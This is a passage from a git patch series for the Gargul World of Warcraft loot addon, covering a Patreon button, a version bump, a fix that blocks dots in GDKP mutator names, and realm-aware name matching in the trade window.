.. GL:uuid(), Window.frame, "UIPanelButtonTemplate"); + PatreonButton:Show(); + PatreonButton:SetSize(170, 43); + PatreonButton:SetPoint("BOTTOMLEFT", Window.frame, "BOTTOMLEFT", 25, 16); + + local HighlightTexture = PatreonButton:CreateTexture(); + HighlightTexture:SetTexture("Interface\\AddOns\\Gargul\\Assets\\Buttons\\patreon"); + HighlightTexture:SetPoint("CENTER", PatreonButton, "CENTER", 0, 0); + HighlightTexture:SetSize(170, 43); + + PatreonButton:SetNormalTexture("Interface\\AddOns\\Gargul\\Assets\\Buttons\\patreon"); + PatreonButton:SetHighlightTexture(HighlightTexture); + + PatreonButton:SetScript("OnClick", function(_, button) + if (button == 'LeftButton') then + GL.Interface.Dialogs.HyperlinkDialog:open{ + description = "Thanks for considering becoming a Patron of Gargul, your support helps tremendously!", + hyperlink = "patreon.com/gargul", + }; + end + end); + self:showSection(section); end From e6ee63db73a85761e7b7d76e16ca0fe65a428fb8 Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Thu, 15 Aug 2024 01:08:37 +0200 Subject: [PATCH 09/11] Version v7.5.11 --- Gargul.toc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gargul.toc b/Gargul.toc index 7814d71f..7dcae0ff 100644 --- a/Gargul.toc +++ b/Gargul.toc @@ -16,7 +16,7 @@ ## Notes: Loot addon that supports GDKP, softres sr, thatsmybis tmb, auto looting, +1 tracking and much more ## IconTexture: Interface\AddOns\Gargul\Assets\Buttons\minimap ## Author: Zhorax - Firemaw -## Version: 7.5.10 +## Version: 7.5.11 ## DefaultState: enabled ## SavedVariables: GargulDB ## X-Donate: https://www.patreon.com/gargul From 74c84bc341c6629e6c60ac4668e554e0f7cc372d Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Tue, 20 Aug 2024 23:07:03 +0200 Subject: [PATCH 10/11] Fixed an issue where people could use dots in their GDKP mutator names, causing issues --- Classes/DB.lua | 8 +++----- Classes/Settings.lua | 15 +++++++++++++++ Data/Localizations/en.lua | 2 +- Interface/Settings/GDKPMutators.lua | 10 ++++++++++ 4 files changed, 29 insertions(+), 6 deletions(-) diff --git a/Classes/DB.lua b/Classes/DB.lua index 5139f3dc..d7b0eefa 100644 --- a/Classes/DB.lua +++ b/Classes/DB.lua @@ -5,7 +5,7 @@ local _, GL = ...; local Events = GL.Events; ---@class DB -GL.DB = { +local DB = { _initialized = false, Tables = { @@ -25,9 +25,8 @@ GL.DB = { }; ---@type DB -local DB = GL.DB; +GL.DB = DB; ----@return void function DB:_init() if (self._initialized) then return; @@ -67,7 +66,7 @@ end ---@param keyString string ---@param value any ----@param ignoreIfExists boolean If the given final key exists then it will not be overwritten +---@param ignoreIfExists ?boolean If the given final key exists then it will not be overwritten ---@return boolean function DB:set(keyString, value, ignoreIfExists) return GL:tableSet(self, keyString, value, ignoreIfExists); @@ -84,7 +83,6 @@ end --- This is just a safety precaution and should strictly --- speaking not be necessary at all, but hey you never know! --- ----@return void function DB:store() for _, identifier in pairs(self.Tables or {}) do GargulDB[identifier] = self[identifier]; diff --git a/Classes/Settings.lua b/Classes/Settings.lua index edfbb8a7..057bf89e 100644 --- a/Classes/Settings.lua +++ b/Classes/Settings.lua @@ -104,6 +104,21 @@ end function Settings:enforceTemporarySettings() --- This is reserved for version-based logic (e.g. cleaning up variables, settings etc.) + --- People found a way to add mutators containing a dot, throwing a wrench in GDKP cut matters + for key, Mutator in pairs (DB:get("Settings.GDKP.Mutators", {})) do + if (not Mutator or not Mutator.name) then + DB:set("Settings.GDKP.Mutators." .. key, nil); + end + + for sessionID, GDKPSession in pairs(DB:get("GDKP.Ledger", {})) do + for key, Mutator in pairs(GL:tableGet(GDKPSession, "Pot.Mutators", {})) do + if (not Mutator or not Mutator.name) then + DB:set("GDKP.Ledger." .. sessionID .. ".Pot.Mutators." .. key, nil); + end + end + end + end + --- No point enforcing these temp settings if the user has never used Gargul --- before or has already loaded this version before! if (GL.firstBoot diff --git a/Data/Localizations/en.lua b/Data/Localizations/en.lua index 4e64ddff..22373778 100644 --- a/Data/Localizations/en.lua +++ b/Data/Localizations/en.lua @@ -244,7 +244,7 @@ You can mix |c00A79EFFMulti-Auction with |c00A79EFFSingle-Auction and the queue L.GDKP_CREATE_SESSION_TYPE_LABEL = "Auction type (|c00A79EFFi for more info)"; L.GDKP_CREATE_SESSION_TYPE_MULTI = "Multi-Auction"; L.GDKP_CREATE_SESSION_TYPE_SINGLE = "Single-Auction"; -L.GDKP_CREATE_SUCCESSFUL = "Session created. We advise you to /reload so that it's stored properly in case your game crashes!"; +L.GDKP_CREATE_SUCCESSFUL = "Session created. We advise you to /reload regularly so that it's stored properly in case your game crashes!"; L.GDKP_CUTS_ADD_RAIDER = "Add Raider"; L.GDKP_CUTS_ADJUST_G = "adjust [g]"; L.GDKP_CUTS_ADJUST_P = "adjust [%]"; diff --git a/Interface/Settings/GDKPMutators.lua b/Interface/Settings/GDKPMutators.lua index b81179af..7fdba56e 100644 --- a/Interface/Settings/GDKPMutators.lua +++ b/Interface/Settings/GDKPMutators.lua @@ -54,6 +54,16 @@ function GDKPMutators:draw(Parent) Name:SetText(MutatorDetails.name); Parent:AddChild(Name); + Name:SetCallback("OnTextChanged", function () + local name = Name:GetText() or ""; + + if (name:match("%.")) then + GL:warning(L.GDKP_MUTATOR_NO_DOTS_WARNING); + Name:SetText(""); + return; + end + end); + local Percentage = GL.AceGUI:Create("EditBox"); Percentage:DisableButton(true); Percentage:SetHeight(20); From 50aea3d83622f257c23ab50e115d770cdf9f2fae Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Tue, 20 Aug 2024 23:07:49 +0200 Subject: [PATCH 11/11] Fixed an issue where players would receive whispers about failed trade attempts on successful trades --- Classes/TradeWindow.lua | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Classes/TradeWindow.lua b/Classes/TradeWindow.lua index 21261875..e9ebb863 100644 --- a/Classes/TradeWindow.lua +++ b/Classes/TradeWindow.lua @@ -64,7 +64,7 @@ function TradeWindow:open(playerName, callback, allwaysExecuteCallback) -- We're already trading with someone if (TradeFrame:IsShown()) then - local playerNameMatches = GL:iEquals(self.State.partner, playerName); + local playerNameMatches = GL:iEquals(self.State.partner, playerName) or GL:iEquals(GL:stripRealm(self.State.partner), playerName); if (type(callback) == "function" and (allwaysExecuteCallback or playerNameMatches) @@ -96,7 +96,7 @@ function TradeWindow:open(playerName, callback, allwaysExecuteCallback) GL.Ace:CancelTimer(timerID); -- Perform the callback - local playerNameMatches = GL:iEquals(self.State.partner, playerName); + local playerNameMatches = GL:iEquals(self.State.partner, playerName) or GL:iEquals(GL:stripRealm(self.State.partner), playerName); if (allwaysExecuteCallback or (TradeFrame:IsShown()